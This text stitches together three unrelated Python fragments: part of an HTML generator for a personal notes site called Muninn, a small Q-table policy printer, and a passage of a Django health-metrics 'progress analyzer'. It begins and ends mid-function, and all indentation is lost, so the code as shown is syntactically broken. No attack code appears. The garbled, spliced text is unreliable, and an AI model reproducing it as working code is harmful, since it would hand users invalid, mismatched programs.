#返回右下角的笔记信息
notes = ch.get_related_notes()
# print("get notes",notes)
notes_html = ""
blog_mold = """
<div class="card">
<div class="card-body">
<h5 class="card-title">
<a class="card-link" href="{note_url}">{note_title}</a> </h5>
<p class="card-text">{note_description}</p>
<small class="card-text text-muted">{note_date}</small>
</div>
</div>"""
quote_mold = """
<div class="card text-right p-3">
<blockquote class="blockquote mb-0">
<p>{note_title}</p>
<footer class="blockquote-footer">
<small class="text-muted">{note_footer}</small>
</footer>
</blockquote>
</div>"""
question_mold = """
<div class="card border-danger">
<div class="card-body">
<p class="card-text">{note_title}</p>
<span class="card-text"><small>{note_date}</small></span>
</div>
</div>"""
explain_mold = """
<div class="card">
<div class="card-body">
<p class="card-text">{note_title}</p>
<span class="card-text"><small>{note_date}</small></span>
</div>
</div>"""
for note in notes:
note_map = {
"note_url":note.sourceuri,
"note_title":note.name,
"note_description":note.description,
"note_date":note.modified_date,
"note_footer":note.footer,
}
if note.mold == "blog":
notehtml = blog_mold.format_map(note_map)
elif note.mold == "quote":
notehtml = quote_mold.format_map(note_map)
elif note.mold == "question":
notehtml = question_mold.format_map(note_map)
elif note.mold == "explain":
notehtml = explain_mold.format_map(note_map)
notes_html += notehtml
chapter_update = ch.get_update()
chapter_url = "/" + ch.get_url(real=True)
else:
#全局页面,非单个章节
chapter_html += """<a href="%s" class="list-group-item list-group-item-action d-flex justify-content-between align-items-center">
%s<span class="badge badge-primary badge-pill">%s</span></a>
"""%(c.get_uri(is_chapter=True,chapter=ch.get_id()),\
ch.get_name(),ch.get_version(only_mark=True))
isc = isc2 = overview_href = ""
if is_chapter:
isc = ""
isc2 = "active"
overview_href = c.get_uri(only_name=True,suffix="_overview.html")
else:
isc = "active"
isc2 = "disabled"
overview_href = "#"
map_c = {
"title": c.get_name(),
"nb_href":"#",
"single_chapter":chapter_html,
"overview":isc,
"notebook":isc2,
"overview_href":overview_href,
"html_now":html_now,
"intro_content":intro_content,
"notes_html":notes_html,
"page_name":c.get_name(),
"chapter_update":chapter_update,
"chapter_url":chapter_url,
}
head_nav = """
<nav class="nav nav-tabs bg-light">
<li class="nav-item">
<small><a class="nav-link">{title}</a></small>
</li>
<li class="nav-item">
<small><a class="nav-link {overview}" href="{overview_href}">Overview</a></small>
</li>
<li class="nav-item">
<small><a class="nav-link" href="#">Course Info</a></small>
</li>
<li class="nav-item">
<small><a class="nav-link {notebook}" href="{nb_href}">Notebook</a></small>
</li>
</nav>""".format_map(map_c)
#row和container不闭合
left_nav = """
<div class="container mt-5 ml-auto">
<div class="row">
<!--左侧-->
<div class="col-md-4">
<!--章节名称-->
<div class="list-group list-group-flush">
{single_chapter}
</div>
<!--章节详细信息-->
<div class="card mt-4">
{html_now}
</div>
</div>
""".format_map(map_c)
header = """<!DOCTYPE html>
<html lang="zh_cn">
<head>
<meta charset="UTF-8">
<title>{page_name} - 课程和笔记</title>
<link rel="stylesheet" href="/css/bootstrap.css">
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</head>
<body>""".format_map(map_c)
footer = """
<footer class="mt-5 pt-5 pl-5 text-muted text-center text-small">
<ul class="list-inline">
<li class="list-inline-item">© 2017-2018 Marvin Studio</li>
<li class="list-inline-item"><a href="#">About Project Muninn</a></li>
</ul>
</footer>
</body>
</html>"""
#此处闭合contaioner和row
intro_html = """<!--右侧-->
<div class="col-md-8 pl-3">
<!--本章概览-->
<div class="card">
<div class="card-header">本章概览</div>
<div class="card-body">
{intro_content}
<p class="card-text">
<small class="text-muted">最后更新于 {chapter_update} <a href="{chapter_url}" target="_black" class="card-link">查看笔记</a></small>
</p>
</div>
</div>
<!--笔记详情-->
<div class="card-columns mt-5">
{notes_html}
</div>
</div>
</div>
</div>""".format_map(map_c)
output_html = header + menu_html + head_nav + left_nav + intro_html + footer
return output_html
def make_Index(html_head):
index_map = {
"html_head":html_head,
"server_version":(server_version if server_version else "Beta"),
}
output_html = """
<!DOCTYPE html>
<html lang="cn">
<head>
<meta charset="UTF-8">
<title>Welcome to Muninn!</title>
<link rel="stylesheet" href="css/bootstrap.css">
</head>
<body>
{html_head}
<div class="container">
<div class="row pt-5">
<div class="col-md-7">
<div class="jumbotron jumbotron-fluid p-5 m-0">
<h1 class="display-4">Hello, Corkine</h1>
<!--<p class="lead">Muninn是一个存放在Github等静态网站托管服务商上的笔记系统,-->
<!--此系统被设计用来整合不同领域的知识。本站点包含了奖励系统、课程系统和笔记系统。-->
<!--你可以使用动态脚本生成站点。</p>-->
<!--<hr class="my-2">-->
<!--<p class="text-muted">本网站是Jupyter Notebook的展示模块,一个动态脚本用来遍历所有文件夹的课程章节的iPynb文件,-->
<!--并且生成html文本,从此脚本中检索标题、更新日期、相关笔记,然后套用一个精致的排版展示出来。-->
<!--</p>-->
<!--<p class="mt-4 lead">-->
<!--<a class="btn btn-lg btn-primary" href="#" role="button">了解更多</a>-->
<!--</p>-->
<p class="mt-3 lead">本周您更新了 1 章节,记录了 3 篇笔记,继续保持!</p>
<hr class="my-2">
<p class="mt-3">自从上次更新,你获得了 <span class="badge badge-secondary">文思泉涌</span> 勋章。</p>
<p class="mt-3 text-muted">最后更新于:2018年6月13日</p>
</div>
<h1 class="lead mt-3 pb-0 pl-1 pt-4">博客聚焦
<br><span class="small text-muted font-weight-light">所有的博客均发布于 blog.mazhangjing.com</span> </h1>
<div class="card mt-3">
<div class="card-body">
<h5 class="card-title lead">Python数据处理学习笔记 - seaborn统计数据可视化篇</h5>
<p class="card-text small text-muted">Seaborn是基于Python的一个统计绘图工具包。Seaborn提供了一组高层次封装的matplotlib API接口。使用Seaborn而不是matplotlib,
绘图只需要少数几行代码,并且可以更加容易控制Style、Palette。本文基本是按照官方Guide顺序写就的。</p>
<a href="#" class="card-link">查看全文</a>
</div>
</div>
<div class="card mt-3">
<div class="card-body">
<h5 class="card-title lead">编程范式——《像计算机科学家一样思考》读书笔记(下)</h5>
<p class="card-text small text-muted">这是我关于《如何像计算机科学家一样思考》一书的体会和总结。此书的副标题叫做《Think Python》,
作者是Allen.B.Downey,欧林计算机学院计算机科学教授,MIT计算机科学学士和硕士,UCB计算机科学博士。
作者本身写作此书的原因是用来讲解的语言是java入门知识,其目标是:简短、循序渐进、专注于编程而非语言。这本书里出现的编程知识基本上是所有语言所共用的,
因此用来做一个程序学习之架构是非常合适,这也是本文希望做的——在这本书的基础上建立一个学习所有编程语言的基本框架。</p>
<a href="#" class="card-link">查看全文</a>
</div>
</div>
<div class="card mt-3">
<div class="card-body">
<h5 class="card-title lead">使用Python和Slack实现字幕组美剧的更新和通知</h5>
<p class="card-text small text-muted">本文介绍了使用Python和Slack实现字幕组美剧更新推送的一种方法,
脚本可以部署在Windows或者GNU/Linux或者macOS平台,使用计划任务或者CRON进行定时执行。你需要一个Slack的Webhook地址,
用于将消息POST到你的APP – Web、Android、iOS、watchOS以及PC、macOS均支持的Slack应用程序。</p>
<a href="#" class="card-link">查看全文</a>
</div>
</div>
<div class="card mt-3">
<div class="card-body">
<h5 class="card-title lead">图书馆七楼的落地窗 - 2017 于桂子山下</h5>
<p class="card-text small text-muted">写在华中师大,2017年底某个上弦月(半月),在地球上,武汉循进阳光的黑暗时(大约下午五点三十九分)。
此文另有姊妹篇,一年前于华中农业大学图书馆,见此: 图书馆五楼的落地窗 - 2016 于狮子山下</p>
<a href="#" class="card-link">查看全文</a>
</div>
</div>
</div>
<div class="col-md-5 pl-5">
<div class="card pb-3">
<!--<div class="card-header">勋章墙</div>-->
<p class="card-title lead mt-4 ml-4">勋章墙 <span class="badge badge-light">06/13 - 06/20</span></p>
<div class="row">
<div class="col-md-4">
<div class="pl-3 pt-3">
<img class="rounded mx-auto d-block" src="src/idea_596.1401384083px_1209661_easyicon.net.png" height="70" width="70" />
<h6 class="lead text-center pt-3">点子多多</h6>
</div>
</div>
<div class="col-md-4">
<div class="p-0 m-0 pt-3">
<img class="rounded mx-auto d-block" src="src/diary_638px_1209882_easyicon.net.png" height="70" width="70"/>
<h5 class="card-title lead text-center pt-3">文思泉涌</h5>
</div>
</div>
<div class="col-md-4">
<div class="pr-3 pt-3">
<img class="rounded mx-auto d-block" src="src/studying_669.79180887372px_1205971_easyicon.net.png" height="70" width="70"/>
<h5 class="card-title lead text-center pt-3">挑灯夜战</h5>
</div>
</div>
<div class="col-md-4">
<div class="pl-3 pt-3">
<img class="rounded mx-auto d-block" src="src/Book_2000px_1170680_easyicon.net.png" height="70" width="70" />
<h5 class="lead text-center pt-3">日积月累</h5>
</div>
</div>
<div class="col-md-4">
<div class="p-0 m-0 pt-3">
<img class="rounded mx-auto d-block" src="src/quote_128px_1088353_easyicon.net.png" height="70" width="70"/>
<h5 class="card-title lead text-center pt-3">引经据典</h5>
</div>
</div>
<div class="col-md-4">
<div class="pr-3 pt-3">
<img class="rounded mx-auto d-block" src="src/sun_783px_1209087_easyicon.net.png" height="70" width="70"/>
<h5 class="card-title lead text-center pt-3">一天之计</h5>
</div>
</div>
<div class="col-md-4">
<div class="pl-3 pt-3">
<img class="rounded mx-auto d-block" src="src/classroom_645.00155520995px_1210165_easyicon.net.png" height="70" width="70" />
<h6 class="lead text-center pt-3">课程达人</h6>
</div>
</div>
<div class="col-md-4">
<div class="p-0 m-0 pt-3">
<img class="rounded mx-auto d-block" src="src/plant_639px_1210114_easyicon.net.png" height="70" width="70"/>
<h5 class="card-title lead text-center pt-3">新的希望</h5>
</div>
</div>
<div class="col-md-4">
<div class="pr-3 pt-3">
<img class="rounded mx-auto d-block" src="src/bee_704px_1210071_easyicon.net.png" height="70" width="70"/>
<h5 class="card-title lead text-center pt-3">乐此不疲</h5>
</div>
</div>
<div class="col-md-4">
<div class="pl-3 pt-3">
<img class="rounded mx-auto d-block" src="src/cup_1088.8906649616px_1205872_easyicon.net.png" height="70" width="70" />
<h5 class="lead text-center pt-3">完美一周</h5>
</div>
</div>
<div class="col-md-4">
<div class="p-0 pt-3">
<img class="rounded mx-auto d-block" src="src/aias_562.56010230179px_1205860_easyicon.net.png" height="70" width="70"/>
<h5 class="card-title lead text-center pt-3">探索发现</h5>
</div>
</div>
<div class="col-md-4">
<div class="pr-3 pt-3">
<img class="rounded mx-auto d-block" src="src/nobel_1564px_1205896_easyicon.net.png" height="70" width="70"/>
<h5 class="card-title lead text-center pt-3">诺贝尔奖</h5>
</div>
</div>
</div>
</div>
<div class="pt-3 pl-1 text-muted small">
<p>我的 Jupyter 笔记系统 · 我的 Github 笔记展示仓库
<br>笔记博客系统部署指南 · Github 代码仓库
<br>Design & Developed by Corkine Ma (Github@corkine)
<br>Server Version: {server_version}
<br>© Marvin Studio 2018 </p>
</div>
</div>
</div>
<footer class="mt-5 pt-5 pl-5 text-muted text-center text-small">
<ul class="list-inline">
<li class="list-inline-item"></li>
<li class="list-inline-item"></li>
</ul>
</footer>
<!--
<footer class="mt-5 pt-5 pl-5 text-muted text-center text-small">
<ul class="list-inline">
<li class="list-inline-item">© 2018 Marvin Studio</li>
<li class="list-inline-item"><a href="#">About Project Muninn</a></li>
<li class="list-inline-item"><a href="#">Jupyter Notebook</a></li>
<li class="list-inline-item"><a href="#">Github@Corkine</a></li>
</ul>
</footer>-->
</body>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</html>
""".format_map(index_map)
return output_html
def writeToFile(c=None,html="",suffix="_overview.html",index=False):
if index:
f = open("index.html","w+",encoding="utf8")
f.write(html)
f.close()
else:
fname_uri = c.get_uri(only_fname=True)
if os.path.isdir(fname_uri):pass
else: os.mkdir(fname_uri)
f = open(c.get_uri(full_path=True,suffix=suffix),"w+",encoding="utf8")
f.write(html)
f.close()
if __name__ == "__main__":
main(update_data=True,file_path="muninn_test_last.data")
|
import numpy as np
def print_policy(q_table, SIZE):
# left, down, right, up
actions = [ ' ⬅ ', ' ⬇ ', ' ➡ ', ' ⬆ ' ]
for i, r in enumerate(q_table):
if 0 == (i % SIZE):
print()
max_action = np.argmax(r)
print(actions[max_action], end='')
|
from datetime import datetime, timedelta
from itertools import zip_longest
from decimal import Decimal, ROUND_HALF_UP
import copy
import json
from django.db.models import Q
from .cumulative_helper import _get_datewise_aa_data
from quicklook.calculations import garmin_calculation
from quicklook.models import UserQuickLook
from user_input.models import UserDailyInput
from progress_analyzer.models import CumulativeSum,\
OverallHealthGradeCumulative, \
NonExerciseStepsCumulative, \
SleepPerNightCumulative, \
MovementConsistencyCumulative, \
ExerciseConsistencyCumulative, \
NutritionCumulative, \
ExerciseStatsCumulative, \
AlcoholCumulative,\
SickCumulative,\
StandingCumulative,\
TravelCumulative,\
StressCumulative,\
OtherStatsCumulative,\
MetaCumulative
from progress_analyzer.helpers.cumulative_helper import\
create_cum_raw_data,\
_get_model_not_related_concrete_fields
class ToOverallHealthGradeCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(OverallHealthGradeCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToNonExerciseStepsCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(NonExerciseStepsCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToSleepPerNightCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(SleepPerNightCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToMovementConsistencyCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(MovementConsistencyCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToExerciseConsistencyCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(ExerciseConsistencyCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToNutritionCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(NutritionCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToExerciseStatsCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(ExerciseStatsCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToAlcoholCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(AlcoholCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToSickCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(SickCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToStressCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(StressCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToTravelCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(TravelCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToStandingCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(StandingCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToOtherStatsCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(OtherStatsCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToMetaCumulative(object):
def __init__(self,raw_data):
fields = _get_model_not_related_concrete_fields(MetaCumulative)
for field in fields:
setattr(self, field, raw_data[field])
class ToCumulativeSum(object):
'''
Creates a fake object which behaves like CumulativeSum object.
Basically used for creating a fake current day CumulativeSum
record to fit within current PA architecure and avoid special
handling.
We do not generate CumulativeSum record for current day until
next day because for current day data will change thoughout
day as soon as users sync their device.So to avoid multiple
database write we defer it till next day and create PA report
for previous day in batch.
To compensate curent day's CumulativeSum we create a fake object
for current day which behaves like a normal CumulativeSum object
and works with current PA code normally without any special
handling.
'''
def __exclude_no_data_yet_hours(self, ql_obj):
'''
If there is any "No Data Yet" hour in the MCs the,
make it 0 because this should not be taken into consideration
while calculating "inactive hours" for current day
'''
mcs = ql_obj.steps_ql.movement_consistency
if mcs:
mcs = json.loads(mcs)
if mcs.get('no_data_hours'):
mcs['no_data_hours'] = 0
ql_obj.steps_ql.movement_consistency = json.dumps(mcs)
return ql_obj
def __init__(self,user,ql_obj,ui_obj,aa_obj,cum_obj=None):
'''
user(:obj:`User`)
ql_obj(:obj:`UserQuickLook`)
ui_obj(:obj:`UserDailyInput`)
aa_obj(dict): Contains Aerobic/Anaerobic data
cum_obj(:obj:`CumulativeSum`,optional)
'''
if ql_obj:
ql_obj = copy.deepcopy(ql_obj)
ql_obj = self.__exclude_no_data_yet_hours(ql_obj)
cum_raw_data = create_cum_raw_data(user,ql_obj,ui_obj,aa_obj,cum_obj)
self.overall_health_grade_cum = ToOverallHealthGradeCumulative(
cum_raw_data["overall_health_grade_cum"]
)
self.non_exercise_steps_cum = ToNonExerciseStepsCumulative(
cum_raw_data["non_exercise_steps_cum"]
)
self.sleep_per_night_cum = ToSleepPerNightCumulative(
cum_raw_data["sleep_per_night_cum"]
)
self.movement_consistency_cum = ToMovementConsistencyCumulative(
cum_raw_data["movement_consistency_cum"]
)
self.exercise_consistency_cum = ToExerciseConsistencyCumulative(
cum_raw_data["exercise_consistency_cum"]
)
self.nutrition_cum = ToNutritionCumulative(
cum_raw_data["nutrition_cum"]
)
self.exercise_stats_cum = ToExerciseStatsCumulative(
cum_raw_data["exercise_stats_cum"]
)
self.alcohol_cum = ToAlcoholCumulative(
cum_raw_data["alcohol_cum"]
)
self.other_stats_cum = ToOtherStatsCumulative(
cum_raw_data["other_stats_cum"]
)
self.sick_cum = ToSickCumulative(
cum_raw_data["sick_cum"]
)
self.stress_cum = ToStressCumulative(
cum_raw_data["stress_cum"]
)
self.travel_cum = ToTravelCumulative(
cum_raw_data["travel_cum"]
)
self.standing_cum = ToStandingCumulative(
cum_raw_data["standing_cum"]
)
self.meta_cum = ToMetaCumulative(
cum_raw_data["meta_cum"]
)
class ProgressReport():
'''Generate Progress Analyzer Reports on the fly'''
def grouped(self,iterable,n,fillvalue):
'''
Return grouped data for any iterable
"s -> (s0,s1,s2,...sn-1), (sn,sn+1,sn+2,...s2n-1), (s2n,s2n+1,s2n+2,...s3n-1), ..."
Arguments
- n: type int, number of item in group
- fillvalue: type obj, If the iterables are of uneven length, missing values
are filled-in with fillvalue
example -
>>> l = [1,2,3,4,5,6,7]
>>> list(pairwise(l,2,None))
>>> [(1,2), (3,4), (5,6), (7,None)]
'''
a = iter(iterable)
return zip_longest(*[a]*n, fillvalue=fillvalue)
def __init__(self,user, query_params):
self.user = user
# Possible PA summary types
self.summary_type = ['overall_health','non_exercise','sleep','mc','ec',
'nutrition','exercise','alcohol','sick','stress','travel','standing','other']
# Possible fixed duration types for PA report
self.duration_type = ['today','yesterday','week','month','year']
self.current_date = self._str_to_dt(query_params.get('date',None))
# Custom date range(s) for which report is to be created
# expected format of the date is 'YYYY-MM-DD'
self.custom_ranges = query_params.get('custom_ranges',None)
year_denominator = 365
if self.current_date:
# Year starts from the day user have Cumulative sums
# for example if user have Cumulative sum record from
# Jan 20, 2019 then year start date would be this and
# number of days will be counted from here on.
self.year_start = self._get_first_from_year_start_date()
yesterday = self.current_date - timedelta(days=1)
if not self.year_start == yesterday:
year_denominator = (yesterday - self.year_start).days + 1
else:
year_denominator = 0
self.duration_denominator = {
'today':1,'yesterday':1, 'week':7, "month":30, "year":year_denominator
}
if self.current_date:
self.cumulative_datewise_data = {q.created_at.strftime("%Y-%m-%d"):q
for q in self._get_cum_queryset()}
self.ql_datewise_data = {q.created_at.strftime("%Y-%m-%d"):q
for q in self._get_ql_queryset()}
self.ui_datewise_data = {q.created_at.strftime("%Y-%m-%d"):q
for q in self._get_ui_queryset()}
self.aa_datewise_data = _get_datewise_aa_data(user,
self.current_date,
self.current_date)
self.custom_daterange = False
if self.custom_ranges:
# it'll be list of tuples, where first item of tuple is the start of range
# and second is end of the range. For example -
# [("2018-02-12","2018-02-17"), ("2018-02-01, 2018-02-29"), ...]
self.custom_ranges = [(self._str_to_dt(r[0]),self._str_to_dt(r[1]))
for r in list(self.grouped(self.custom_ranges.split(","),2,None))
if r[0] and r[1]]
self.cumulative_datewise_data_custom_range = {q.created_at.strftime("%Y-%m-%d"):q
for q in self._get_cum_queryset_custom_range(self.custom_ranges)}
if not self.current_date:
self.duration_type = []
for r in self.custom_ranges:
str_range = r[0].strftime("%Y-%m-%d")+" to "+r[1].strftime("%Y-%m-%d")
if not r[1] == r[0]:
self.duration_denominator[str_range] = (r[1] - r[0]).days + 1
else:
self.duration_denominator[str_range] = 1
self.custom_daterange = True
summaries = query_params.get('summary',None)
if summaries:
# Remove all the summary types except for what
# is requested
summaries = [item.strip() for item in summaries.strip().split(',')]
allowed = set(summaries)
existing = set(self.summary_type)
for s in existing-allowed:
self.summary_type.pop(self.summary_type.index(s))
duration = query_params.get('duration',None)
# Remove all the duration types except for what
# is requested
if duration and self.current_date:
duration = [item.strip() for item in duration.strip().split(',')]
allowed = set(duration)
existing = set(self.duration_type)
for d in existing-allowed:
self.duration_type.pop(self.duration_type.index(d))
self.todays_cum_data = self._get_todays_cum_data()
@property
def todays_cum_data(self):
return self.__todays_cum_data
@todays_cum_data.setter
def todays_cum_data(self,data):
self.__todays_cum_data = data
def _get_todays_cum_data(self):
'''
Create todays cumulative data by merging todays raw report
and yesterday cumulative sum (if available) and user inputs
data
'''
todays_ql_data = self.ql_datewise_data.get(
self.current_date.strftime("%Y-%m-%d"),None)
todays_ui_data = self.ui_datewise_data.get(
self.current_date.strftime("%Y-%m-%d"),None)
todays_aa_data = self.aa_datewise_data.get(
self.current_date.strftime("%Y-%m-%d"),None)
yesterday_data = self.cumulative_datewise_data.get(
(self.current_date-timedelta(days=1)).strftime("%Y-%m-%d"),None)
todays_cum = None
if todays_ql_data:
if yesterday_data:
todays_cum = ToCumulativeSum(
self.user,
todays_ql_data,
todays_ui_data,
todays_aa_data,
yesterday_data
)
else:
todays_cum = ToCumulativeSum(
self.user,
todays_ql_data,
todays_ui_data,
todays_aa_data
)
return todays_cum
def _str_to_dt(self,dt_str):
if dt_str:
return datetime.strptime(dt_str, "%Y-%m-%d")
else:
return None
def _hours_to_hours_min(self,hours):
if hours:
mins = hours * 60
hours,mins = divmod(mins,60)
hours = round(hours)
if mins < 59:
# if minute is less than 59 then round it
# otherwise don't because it'll be rounded to
# 60 and look like 5:60 which is incorrect
mins = round(mins)
else:
mins = int(mins)
if mins < 10:
mins = "{:02d}".format(mins)
return "{}:{}".format(hours,mins)
return "00:00"
def _min_to_min_sec(self,mins):
if mins:
seconds = mins * 60
mins,seconds = divmod(seconds,60)
mins = round(mins)
if seconds < 59:
seconds = round(seconds)
else:
seconds = int(seconds)
if seconds < 10:
seconds = "{:02d}".format(seconds)
return "{}:{}".format(mins,seconds)
return "00:00"
def _get_average(self,stat1, stat2, demominator):
if demominator:
avg = (stat1 - stat2)/demominator
return avg
return 0
def _get_average_for_duration(self, stat1, stat2, duration_type):
if not stat1 == None and not stat2 == None:
denominator = self.duration_denominator.get(duration_type)
return self._get_average(stat1,stat2,denominator)
return 0
def _get_model_related_fields_names(self,model):
related_fields_names = [f.name for f in model._meta.get_fields()
if (f.one_to_many or f.one_to_one)
and f.auto_created and not f.concrete]
return related_fields_names
def _get_first_from_year_start_date(self):
'''
Return the date of first cumulative sum record from the
start of the year(Jan 1,inclusive).If there is no record
then returns the default date Jan 1 of the current year.
'''
year_start = datetime(self.current_date.year,1,1)
year_end = year_start - timedelta(days=1)
first_from_year_start = CumulativeSum.objects.filter(
created_at__gte=year_end,
user = self.user
).order_by('created_at')[:1]
try:
qobj = first_from_year_start[0]
return datetime(qobj.created_at.year,
qobj.created_at.month,
qobj.created_at.day) + timedelta(days=1)
except IndexError:
return year_start
def _get_cum_queryset(self):
"""
Returns queryset of CumulativeSum for "today", "yesterday",
"day before yesterday","week", "month", "year" according
to current date
"""
duration_end_dt = self._get_duration_datetime(self.current_date)
user = self.user
# duration_end_dt.pop('today') # no need of today
day_before_yesterday = self.current_date - timedelta(days=2)
filters = Q(created_at=day_before_yesterday)
for d in duration_end_dt.values():
filters |= Q(created_at=d)
related_fields = self._get_model_related_fields_names(CumulativeSum)
cumulative_data_qs = CumulativeSum.objects.select_related(*related_fields).filter(
filters,user=user
)
return cumulative_data_qs
def _get_ql_queryset(self):
"""
Returns queryset of Quicklook for "today"
according to current_date
"""
user = self.user
filters = Q(created_at=self.current_date.date())
related_fields = self._get_model_related_fields_names(UserQuickLook)
ql_data_qs = UserQuickLook.objects.select_related(*related_fields).filter(
filters, user = user
)
return ql_data_qs
def _get_ui_queryset(self):
"""
Returns queryset of User Inputs for "today"
according to current_date
"""
user = self.user
filters = Q(created_at=self.current_date.date())
related_fields = self._get_model_related_fields_names(UserDailyInput)
ui_data_qs = UserDailyInput.objects.select_related(*related_fields).filter(
filters, user = user
)
return ui_data_qs
def _get_cum_queryset_custom_range(self,custom_ranges):
user = self.user
filters = Q()
for r in custom_ranges:
day_before_from_date = r[0] - timedelta(days=1)
filters |= Q(Q(created_at=r[1].date()) | Q (created_at=day_before_from_date.date()))
related_fields = self._get_model_related_fields_names(CumulativeSum)
cumulative_data_qs = CumulativeSum.objects.select_related(*related_fields).filter(
filters, user = user
)
return cumulative_data_qs
def _get_duration_datetime(self,current_date):
duration = {
'today': current_date.date(),
'yesterday':(current_date - timedelta(days=1)).date(),
# Avg excluding today
'week':(current_date - timedelta(days=8)).date(),
'month':(current_date - timedelta(days=31)).date(),
#from start of the year to current date
'year':(self.year_start - timedelta(days=1)).date()
}
return duration
def _get_last_three_days_data(self,summary_type):
'''
Return the Cumulative data for specifed summary type and
cumulative 'meta' data for today, yesterday and day before
yesterday (calculated from current date)
Args:
summary_type(string): Summary type for which cumulative data is
required. Possible summary types are defined in self.summary_type
Returns:
dict: Return a dictionary whose value is a tuple. Tuple have
following values in same order-
1) Cumulative data of particular summary type
2) cumulative data for meta summary
'''
todays_data = None
todays_meta_data = None
yesterday_data = self.cumulative_datewise_data.get(
(self.current_date-timedelta(days=1)).strftime("%Y-%m-%d"),None)
yesterday_meta_data = None
day_before_yesterday_data = self.cumulative_datewise_data.get(
(self.current_date-timedelta(days=2)).strftime("%Y-%m-%d"),None)
day_before_yesterday_meta_data = None
if self.todays_cum_data:
todays_meta_data = self.todays_cum_data.__dict__.get("meta_cum")
todays_data = self.todays_cum_data.__dict__.get(summary_type)
if yesterday_data:
# Because of select related, attribute names become "_attrname_cache"
cached_summary_type = "_{}_cache".format(summary_type)
yesterday_meta_data = yesterday_data.__dict__.get("_meta_cum_cache")
yesterday_data = yesterday_data.__dict__.get(cached_summary_type)
if day_before_yesterday_data:
cached_summary_type = "_{}_cache".format(summary_type)
day_before_yesterday_meta_data = day_before_yesterday_data.__dict__.get("_meta_cum_cache")
day_before_yesterday_data = day_before_yesterday_data.__dict__.get(cached_summary_type)
data = {
"today":(todays_data,todays_meta_data),
"yesterday":(yesterday_data,yesterday_meta_data),
"day_before_yesterday":(
day_before_yesterday_data,
day_before_yesterday_meta_data
)
}
return data
def _generic_custom_range_calculator(self,key,alias,summary_type,custom_avg_calculator):
'''
Generates averages for provided summary type for custom ranges,
similar to the _generic_summary_calculator.
Args:
key(str): Key for which average need to be calculates. This
corresponds to the keys in 'calculated_data' dict.
alias(str): Duration type for which average need to be
calculated. In this case it will be 'custom_range'
summary_type(string): Summary type for which averages to be
calculated. This summary type is the relative name of the
model which stores the cumulative data of any summary type
mentioned in self.summary_type. For example, model of
summary type "overall_health" have relative name
"overall_health_grade_cum"
custom_avg_calculator (function): A function which have average
logic for every field in given summary type.
'''
custom_average_data = {}
for r in self.custom_ranges:
#for select related
to_select_related = lambda x : "_{}_cache".format(x)
day_before_from_date = r[0] - timedelta(days=1)
todays_ui_data = self.ui_datewise_data.get(
self.current_date.strftime("%Y-%m-%d"),None)
todays_aa_data = self.aa_datewise_data.get(
self.current_date.strftime("%Y-%m-%d"),None)
range_start_data = self.cumulative_datewise_data_custom_range.get(
day_before_from_date.strftime("%Y-%m-%d"),None
)
range_end_data = self.cumulative_datewise_data_custom_range.get(
r[1].strftime("%Y-%m-%d"),None
)
format_summary_name = True
if not range_end_data and r[1] == self.current_date:
yesterday_cum_data = self.cumulative_datewise_data.get(
(r[1]-timedelta(days=1)).strftime("%Y-%m-%d"),None
)
range_end_data = self.ql_datewise_data.get(
r[1].strftime("%Y-%m-%d"),None
)
if range_end_data and yesterday_cum_data:
range_end_data = ToCumulativeSum(
self.user,range_end_data,todays_ui_data,todays_aa_data,yesterday_cum_data
)
